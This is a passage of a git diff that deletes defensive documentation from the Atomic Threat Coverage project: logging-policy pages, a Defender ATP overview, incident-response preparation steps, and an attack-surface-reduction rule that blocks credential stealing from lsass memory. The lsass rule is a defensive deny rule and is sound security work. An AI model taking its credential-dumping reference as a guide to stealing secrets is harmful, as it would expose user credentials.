-- Network security: Restrict NTLM: Audit Incoming NTLM Traffic: Enable audit for all accounts
-- Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers. Policy Setting: Audit all
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0045_windows_audit_filtering_platform_connection.md b/Atomic_Threat_Coverage/Logging_Policies/LP0045_windows_audit_filtering_platform_connection.md
deleted file mode 100644
index 45e4143..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0045_windows_audit_filtering_platform_connection.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title            | LP0045_windows_audit_filtering_platform_connection                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Filtering Platform Connection determines whether the operating  system generates audit events when connections are allowed or blocked  by the Windows Filtering Platform                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Extremely High                                                                    |
-| **EventID**      | <ul><li>5031</li><li>5150</li><li>5151</li><li>5154</li><li>5155</li><li>5156</li><li>5157</li><li>5158</li><li>5159</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-connection](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-connection)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Group Policies:
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Security Audit Policy Settings >
-Audit Policies >
-Object Access >
-Audit Filtering Platform Connection (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0046_windows_audit_security_state_change.md b/Atomic_Threat_Coverage/Logging_Policies/LP0046_windows_audit_security_state_change.md
deleted file mode 100644
index 6a06196..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0046_windows_audit_security_state_change.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title            | LP0046_windows_audit_security_state_change                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Security State Change contains Windows startup, recovery,  and shutdown events, and information about changes in system time                                                               |
-| **Default**      | Configured                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul><li>4608</li><li>4616</li><li>4621</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-state-change](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-state-change)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Group Policies:
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Security Audit Policy Settings >
-Audit Policies >
-System >
-Audit Security State Change (Success)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0047_BIND_DNS_queries.md b/Atomic_Threat_Coverage/Logging_Policies/LP0047_BIND_DNS_queries.md
deleted file mode 100644
index cbaa787..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0047_BIND_DNS_queries.md
+++ /dev/null
@@ -1,24 +0,0 @@
-| Title            | LP0047_BIND_DNS_queries                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Configuration to enable DNS queries log on BIND server                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>None</li></ul>         |
-| **References**   | <ul><li>[None](None)</li></ul> |
-
-
-
-## Configuration
-
-logging {
-        channel queries_log {
-                file "/var/named/log/queries" versions 600 size 40m;
-                print-category yes;
-                print-severity yes;
-                print-time yes;
-                severity info;
-        };
-        category queries { queries_log; };
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0048_Passive_DNS_logging.md b/Atomic_Threat_Coverage/Logging_Policies/LP0048_Passive_DNS_logging.md
deleted file mode 100644
index 464e126..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0048_Passive_DNS_logging.md
+++ /dev/null
@@ -1,33 +0,0 @@
-| Title            | LP0048_Passive_DNS_logging                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Configuration to enable logging of all fields logging in Passive DNS                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>None</li></ul>         |
-| **References**   | <ul><li>[None](None)</li></ul> |
-
-
-
-## Configuration
-
-#/etc/default/passivedns
-#Manually set the values to log:
-
-# FIELDS:
-#  H: YMD-HMS Stamp S: Timestamp(s)  M: Timestamp(ms)  c: Client IP 
-#  s: Server IP     C: Class         Q: Query          T: Type      
-#  A: Answer        t: TTL           n: Count
-  
-LOGFIELDS=SMcsCQTAtn
-  
-#Manually set DNS RR Types to care about
-  
-# FLAGS:
-#  4:A    6:AAAA  C:CNAME  D:DNAME  N:NAPTR  O:SOA
-#  P:PTR  R:RP    S:SRV    T:TXT    M:MX     n:NS
-#  x:NXD
-  
-DNSRRTYPES=46CDNOPRSTMnx
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0100_windows_audit_security_system_extension.md b/Atomic_Threat_Coverage/Logging_Policies/LP0100_windows_audit_security_system_extension.md
deleted file mode 100644
index 4b0ebf1..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0100_windows_audit_security_system_extension.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0100_windows_audit_security_system_extension                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Security System Extension contains information about the loading of an  authentication package, notification package, or security package, plus  information about trusted logon process registration events                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul><li>4610</li><li>4611</li><li>4614</li><li>4622</li><li>4697</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-system-extension](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-system-extension)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration > 
-Policies > 
-Windows Settings > 
-Security Settings > 
-Advanced Audit Policies Configuration > 
-Audit Policies > 
-System > 
-Audit Security System Extension (Success)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0101_windows_audit_security_group_management.md b/Atomic_Threat_Coverage/Logging_Policies/LP0101_windows_audit_security_group_management.md
deleted file mode 100644
index e86e967..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0101_windows_audit_security_group_management.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0101_windows_audit_security_group_management                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Security Group Management determines whether the operating system generates audit events when specific security group management tasks are performed                                                               |
-| **Default**      | Partially (Success)                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul><li>4731</li><li>4732</li><li>4733</li><li>4734</li><li>4735</li><li>4764</li><li>4799</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/e7d434a47116a0b49fed43e652a07031d8249ae2/windows/security/threat-protection/auditing/audit-security-group-management.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/e7d434a47116a0b49fed43e652a07031d8249ae2/windows/security/threat-protection/auditing/audit-security-group-management.md)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration >
-Policies >
-Windows Settings >
-Security Settings >
-Advanced Audit Policies Configuration >
-Audit Policies >
-Account Management >
-Audit Security Group Management (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0102_windows_audit_file_system.md b/Atomic_Threat_Coverage/Logging_Policies/LP0102_windows_audit_file_system.md
deleted file mode 100644
index af20817..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0102_windows_audit_file_system.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0102_windows_audit_file_system                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit File System determines whether the operating system generates audit events when users attempt to access file system objects                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul><li>4656</li><li>4658</li><li>4660</li><li>4663</li><li>4664</li><li>4985</li><li>5051</li><li>4670</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-file-system.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-file-system.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Audit Policy Configuration >
-Audit Policies >
-Object Access >
-Audit File system (Success, Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0103_windows_audit_registry.md b/Atomic_Threat_Coverage/Logging_Policies/LP0103_windows_audit_registry.md
deleted file mode 100644
index fdb478f..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0103_windows_audit_registry.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0103_windows_audit_registry                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Registry allows you to audit attempts to access registry objects.  A security audit event is generated only for objects that have system access  control lists (SACLs) specified, and only if the type of access requested, such  as Read, Write, or Modify, and the account making the request match the  settings in the SACL. If success auditing is enabled, an audit entry is generated each time any account  successfully accesses a registry object that has a matching SACL. If failure auditing  is enabled, an audit entry is generated each time any user unsuccessfully attempts  to access a registry object that has a matching SACL                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Medium                                                                    |
-| **EventID**      | <ul><li>4663</li><li>4656</li><li>4658</li><li>4660</li><li>4657</li><li>5039</li><li>4670</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-registry.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-registry.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Audit Policy Configuration >
-Audit Policies >
-Object Access >
-Audit Registry (Success, Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0104_windows_audit_removable_storage.md b/Atomic_Threat_Coverage/Logging_Policies/LP0104_windows_audit_removable_storage.md
deleted file mode 100644
index 98ee77d..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0104_windows_audit_removable_storage.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0104_windows_audit_removable_storage                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Removable Storage allows you to audit user attempts to access file  system objects on a removable storage device. A security audit event is  generated for all objects and all types of access requested, with no  dependency on object’s SACL                                                               |
-| **Default**      | Configured                                                                   |
-| **Event Volume** | Medium                                                                    |
-| **EventID**      | <ul><li>4656</li><li>4658</li><li>4663</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-removable-storage.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-removable-storage.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Security Audit Policy Settings >
-Audit Policies >
-Object Access >
-Audit Removable Storage (Success, Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0105_windows_audit_authorization_policy_change.md b/Atomic_Threat_Coverage/Logging_Policies/LP0105_windows_audit_authorization_policy_change.md
deleted file mode 100644
index b1e8770..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0105_windows_audit_authorization_policy_change.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0105_windows_audit_authorization_policy_change                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Authorization Policy Change allows you to audit assignment and removal  of user rights in user right policies, changes in security token object  permission, resource attributes changes and Central Access Policy changes  for file system objects                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul><li>4703</li><li>4704</li><li>4705</li><li>4670</li><li>4911</li><li>4913</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-authorization-policy-change.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-authorization-policy-change.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Audit Policy Configuration >
-Audit Policies >
-Policy Change >
-Audit Authorization Policy Change (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0106_windows_audit_kerberos_service_ticket_operations.md b/Atomic_Threat_Coverage/Logging_Policies/LP0106_windows_audit_kerberos_service_ticket_operations.md
deleted file mode 100644
index 014b6a7..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0106_windows_audit_kerberos_service_ticket_operations.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0106_windows_audit_kerberos_service_ticket_operations                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Kerberos Service Ticket Operations determines whether the operating  system generates security audit events for Kerberos service ticket requests. Events are generated every time Kerberos is used to authenticate a user who  wants to access a protected network resource. Kerberos service ticket  operation audit events can be used to track user activity                                                               |
-| **Default**      | Partially (Other)                                                                   |
-| **Event Volume** | Extremely High                                                                    |
-| **EventID**      | <ul><li>4769</li><li>4770</li><li>4773</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-kerberos-service-ticket-operations.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-kerberos-service-ticket-operations.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Security Audit Policy Settings >
-Audit Policies >
-Account Logon >
-Audit Kerberos Service Ticket Operations (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0107_windows_audit_credential_validation.md b/Atomic_Threat_Coverage/Logging_Policies/LP0107_windows_audit_credential_validation.md
deleted file mode 100644
index 3879179..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0107_windows_audit_credential_validation.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0107_windows_audit_credential_validation                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Credential Validation determines whether the operating system  generates audit events on credentials that are submitted for a user  account logon request                                                               |
-| **Default**      | Configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>4774</li><li>4775</li><li>4776</li><li>4777</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-credential-validation.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-credential-validation.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Security Audit Policy Settings >
-Audit Policies >
-Account Logon >
-Audit Credential Validation (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0108_windows_powershell_module_logging.md b/Atomic_Threat_Coverage/Logging_Policies/LP0108_windows_powershell_module_logging.md
deleted file mode 100644
index bda9342..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0108_windows_powershell_module_logging.md
+++ /dev/null
@@ -1,30 +0,0 @@
-| Title            | LP0108_windows_powershell_module_logging                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Module logging records pipeline execution details as PowerShell executes,  including variable initialization and command invocations.  Module logging will record portions of scripts, some de-obfuscated code,  and some data formatted for output.  This logging will capture some details missed by other PowerShell logging sources,  though it may not reliably capture the commands executed                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>4103</li></ul>         |
-| **References**   | <ul><li>[https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html](https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration > 
-Administrative Templates > 
-Windows PowerShell > 
-Turn on Module Logging (Enable)
-```
-To specify modules which should be logged set them in `Show...` dialog. Wildcards are supported.
-
-Enabling via registry key:
-```
-reg add "hklm\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" /v EnableModuleLogging /t REG_DWORD /d 1
-reg add "hklm\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" /v "*" /t REG_SZ /d "*"
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0109_windows_powershell_script_block_log.md b/Atomic_Threat_Coverage/Logging_Policies/LP0109_windows_powershell_script_block_log.md
deleted file mode 100644
index 95430a3..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0109_windows_powershell_script_block_log.md
+++ /dev/null
@@ -1,28 +0,0 @@
-| Title            | LP0109_windows_powershell_script_block_logging                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Script block logging records blocks of code as they are executed by the PowerShell engine,  thereby capturing the full contents of code executed by an attacker, including scripts and commands.  Due to the nature of script block logging, it also records de-obfuscated code as it is executed.  PowerShell 5.0 will automatically log code blocks if the block’s contents match on a list of suspicious commands or scripting techniques,  even if script block logging is not enabled. These suspicious blocks are logged at the “warning” level in EID 4104,  unless script block logging is explicitly disabled.                                                               |
-| **Default**      | Partially (Other)                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>4104</li></ul>         |
-| **References**   | <ul><li>[https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html](https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration > 
-Administrative Templates > 
-Windows PowerShell > 
-Turn on PowerShell Script Block Logging (Enable)
-```
-
-Enabling via registry key:
-```
-reg add "hklm\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" /v EnableScriptBlockLogging /t REG_DWORD /d 1
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0110_windows_powershell_transcript.md b/Atomic_Threat_Coverage/Logging_Policies/LP0110_windows_powershell_transcript.md
deleted file mode 100644
index 974e1cc..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0110_windows_powershell_transcript.md
+++ /dev/null
@@ -1,32 +0,0 @@
-| Title            | LP0110_windows_powershell_transcript                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Records each PowerShell session with input and output to a file                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>None</li></ul>         |
-| **References**   | <ul><li>[https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html](https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration > 
-Administrative Templates > 
-Windows PowerShell > 
-Turn on PowerShell Script Block Transcription (Enable)
-Check "Include Invokation headers"
-Put Path to Output Directory (if not set it will be stored under user's documents)
-```
-
-Enabling via registry key:
-```
-reg add "hklm\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" /v EnableInvocationHeader /t REG_DWORD /d 1
-reg add "hklm\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" /v EnableTranscripting /t REG_DWORD /d 1
-reg add "hklm\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" /v OutputDirectory /t REG_SZ /d "C:\pstranscripts"
-```
-
-
diff --git a/Atomic_Threat_Coverage/Mitigation_Policies/MP_0001_windows_asr_block_credential_stealing_from_lsass.md b/Atomic_Threat_Coverage/Mitigation_Policies/MP_0001_windows_asr_block_credential_stealing_from_lsass.md
deleted file mode 100644
index f1be671..0000000
--- a/Atomic_Threat_Coverage/Mitigation_Policies/MP_0001_windows_asr_block_credential_stealing_from_lsass.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title                     | MP_0001_windows_asr_block_credential_stealing_from_lsass                                                                          |
-|:--------------------------|:-------------------------------------------------------------------------------------|
-| **Description**           | Attack surface reduction (ASR) rule ID 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2:  "Block credential stealing from the Windows local security authority subsystem  (lsass.exe)" blocks a program when it opens lsass process memory                                                                    |
-| **ATT&amp;CK Tactic**     | <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique**  | <ul><li>[T1003: Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **ATT&amp;CK Mitigation** | <ul><li>[M1043: Credential Access Protection](https://attack.mitre.org/mitigations/M1043)</li></ul>  |
-| **Mitigation System**     | <ul><li>[MS_0001_microsoft_defender_advanced_threat_protection](../Mitigation_Systems/MS_0001_microsoft_defender_advanced_threat_protection.md)</li></ul>  |
-| **Platform**              | <ul><li>Windows</li></ul>                   |
-| **Minimum Version**       | <ul><li>Windows 10 versions 1709</li><li>Windows Server version 1803</li></ul>      |
-| **Prerequisites**         | <ul><li>Windows 10 Enterprise license</li><li>Windows Defender Antivirus enabled</li></ul>                |
-| **References**            | <ul><li>[https://www.tenforums.com/windows-10-news/115985-interpreting-windows-defender-exploit-guard-asr-audit-alerts.html](https://www.tenforums.com/windows-10-news/115985-interpreting-windows-defender-exploit-guard-asr-audit-alerts.html)</li><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction)</li></ul>      |
-
-
-## Configuration
-
-Recommended way is to first enable the rule in audit mode:
-
-```
-PS> Add-MpPreference -AttackSurfaceReductionRules_Ids 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 -AttackSurfaceReductionRules_Actions AuditMode
-```
-
-Then exclude legitimate processes (like `GoogleUpdate.exe` and `taskmgr.exe`) reviewing events generated, then enforce blocking mode:
-
-```
-PS> Add-MpPreference -AttackSurfaceReductionRules_Ids 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 -AttackSurfaceReductionRules_Actions Enabled
-```
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Mitigation_Systems/MS_0001_microsoft_defender_advanced_threat_protection.md b/Atomic_Threat_Coverage/Mitigation_Systems/MS_0001_microsoft_defender_advanced_threat_protection.md
deleted file mode 100644
index 3b1c208..0000000
--- a/Atomic_Threat_Coverage/Mitigation_Systems/MS_0001_microsoft_defender_advanced_threat_protection.md
+++ /dev/null
@@ -1,20 +0,0 @@
-| Title               | MS_0001_microsoft_defender_advanced_threat_protection                                                                     |
-|:--------------------|:--------------------------------------------------------------------------------|
-| **Platform**        | <ul><li>Windows</li></ul>              |
-| **Minimum Version** | <ul><li>Windows 10</li><li>Windows Server 2016</li></ul> |
-| **References**      | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/](https://docs.microsoft.com/en-us/windows/security/threat-protection/)</li><li>[https://attackevals.mitre.org/microsoft.1.apt3.1_configuration](https://attackevals.mitre.org/microsoft.1.apt3.1_configuration)</li><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection](https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection)</li></ul> |
-
-## Description
-
-Microsoft Defender Advanced Threat Protection (ATP) is a unified platform for preventative protection, post-breach detection, automated investigation, and response. 
-Microsoft Defender ATP protects endpoints from cyber threats; detects advanced attacks and data breaches, automates security incidents and improves security posture.
-The platform includes: 
-
-- Attack Surface Reduction (ASR): This capability resist attacks and exploitations (integrating and expanding EMET capabilities into Windows)
-- Threat & Vulnerability Management: This capability uses risk-based approach to the discovery, prioritization, and remediation of endpoint vulnerabilities and misconfigurations
-- Windows Defender Antivirus (WD AV) so called "Next generation protection": a built-in antimalware solution that provides next generation protection for desktops, portable computers, and servers
-- Endpoint detection and response: Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced threats that may have made it past the first two security pillars
-- Automated investigation and remediation: In conjunction with being able to quickly respond to advanced attacks, Microsoft Defender ATP offers automatic investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale
-- Secure score: This capability helps to dynamically assess the security state of enterprise network, identify unprotected systems, and take recommended actions to improve the overall security of an organization
-- Microsoft Threat Experts: Microsoft Defender ATP's new managed threat hunting service provides proactive hunting, prioritization and additional context and insights that further empower Security Operation Centers (SOCs) to identify and respond to threats quickly and accurately
-- Management and APIs: This capability helps to integrate Microsoft Defender Advanced Threat Protection into existing workflows
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1001_practice.md b/Atomic_Threat_Coverage/Response_Actions/RA_1001_practice.md
deleted file mode 100644
index 2a324a9..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1001_practice.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Practice         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1001            |
-| **Description**             | Practice in the real environment. Sharpen Response Actions within your organization   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 08.04.2020 |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-
-### Workflow
-
-Make sure that most of the Response Action has been performed on an internal exercise by your Incident Response Team.  
-You need to make sure that when an Incident will happen, the team will not just try to follow the playbooks they see first time in their lives, but will be able to quickly execute the actual steps in **your environment**, i.e. blocking an IP address or a domain name.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1002_take_trainings.md b/Atomic_Threat_Coverage/Response_Actions/RA_1002_take_trainings.md
deleted file mode 100644
index 99b2416..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1002_take_trainings.md
+++ /dev/null
@@ -1,22 +0,0 @@
-| Title                       | Take trainings         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1002            |
-| **Description**             | Take training courses to gain relevant knowledge   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 08.04.2020 |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-
-### Workflow
-
-> We do not rise to the level of our expectations. We fall to the level of our training.  
-
-Here are some relevant training courses that will help you in the Incident Response activities:  
-
-1. [Investigation Theory](https://chrissanders.org/training/investigationtheory/) by Chris Sanders. We recommend you to have it as a mandatory training for every member of your Incident Response team  
-2. [Offensive Security](https://www.offensive-security.com/courses-and-certifications/) trainings. We recommend [PWK](https://www.offensive-security.com/pwk-oscp/) to begin with  
-3. [SANS Digital Forensics & Incident Response](https://digital-forensics.sans.org/training/courses) trainings  
-
-Offensive Security trainings are in the list because to fight a threat, you need to understand their motivation, tactics, and techniques.  
-
-At the same time, we assume that you already have a strong technical background in fundamental disciplines — Networking, Operating Systems, and Programming.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1003_raise_personnel_awareness.md b/Atomic_Threat_Coverage/Response_Actions/RA_1003_raise_personnel_awareness.md
deleted file mode 100644
index 322b2d3..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1003_raise_personnel_awareness.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Raise personnel awareness         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1003            |
-| **Description**             | Raise personnel awareness regarding phishing, ransomware, social engineering,  and other attacks that involve user interaction   |
-| **Author**                  | @atc_project, ported from @MITREattack        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | General      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://attack.mitre.org/mitigations/M1017/](https://attack.mitre.org/mitigations/M1017/)</li></ul>|
-
-### Workflow
-
-Train users to to be aware of access or manipulation attempts by an adversary to reduce the risk of 
-successful spearphishing, social engineering, and other techniques that involve user interaction.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1004_make_personnel_report_suspicious_activity.md b/Atomic_Threat_Coverage/Response_Actions/RA_1004_make_personnel_report_suspicious_activity.md
deleted file mode 100644
index 9b8bc40..0000000
